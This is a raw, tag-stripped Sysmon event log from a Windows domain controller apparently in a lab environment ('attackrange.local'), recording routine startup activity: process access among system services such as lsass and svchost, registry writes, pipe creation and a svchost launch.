12:00:44.534{266CAFBE-646C-6064-0C00-00000000AE01}592836C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.534{266CAFBE-646C-6064-0C00-00000000AE01}592836C:\Windows\system32\svchost.exe{266CAFBE-6469-6064-0500-00000000AE01}624C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.534{266CAFBE-646C-6064-0C00-00000000AE01}592836C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.534{266CAFBE-646C-6064-0C00-00000000AE01}592836C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\system32\wininit.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.534{266CAFBE-6467-6064-0200-00000000AE01}432440C:\Windows\System32\smss.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6c14|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 13241300x80000000000000001076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:44.502{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 13241300x80000000000000001075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.502{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 13241300x80000000000000001074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.502{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 10341000x80000000000000001073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.471{266CAFBE-646A-6064-0700-00000000AE01}696\Winsock2\CatalogChangeListener-2b8-0C:\Windows\system32\wininit.exe 17141700x80000000000000001070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.471{266CAFBE-646C-6064-0D00-00000000AE01}612\epmapperC:\Windows\system32\svchost.exe 10341000x80000000000000001069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.471{266CAFBE-646C-6064-0C00-00000000AE01}592692C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+46868|c:\windows\system32\rpcss.dll+3a983|c:\windows\system32\rpcss.dll+3a8ee|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.456{266CAFBE-646C-6064-0D00-00000000AE01}612\Winsock2\CatalogChangeListener-264-0C:\Windows\system32\svchost.exe 10341000x80000000000000001067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.456{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.456{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.440{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.440{266CAFBE-646A-6064-0A00-00000000AE01}840932C:\Windows\system32\services.exe{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.424{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.424{266CAFBE-646A-6064-0A00-00000000AE01}840844C:\Windows\system32\services.exe{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+1a423|C:\Windows\system32\services.exe+20187|C:\Windows\system32\services.exe+21f27|C:\Windows\system32\services.exe+2486c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.409{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.409{266CAFBE-646A-6064-0B00-00000000AE01}856580C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.409{266CAFBE-646A-6064-0B00-00000000AE01}856580C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.377{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.252{266CAFBE-646A-6064-0A00-00000000AE01}840932C:\Windows\system32\services.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.252{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.252{266CAFBE-646A-6064-0A00-00000000AE01}840844C:\Windows\system32\services.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+1a698|C:\Windows\system32\services.exe+1a391|C:\Windows\system32\services.exe+20187|C:\Windows\system32\services.exe+21f27|C:\Windows\system32\services.exe+2486c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.251{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.237{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:43.674{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database EpochDWORD (0x000067ec) 10341000x80000000000000001051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:43.002{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:43.002{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:43.002{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 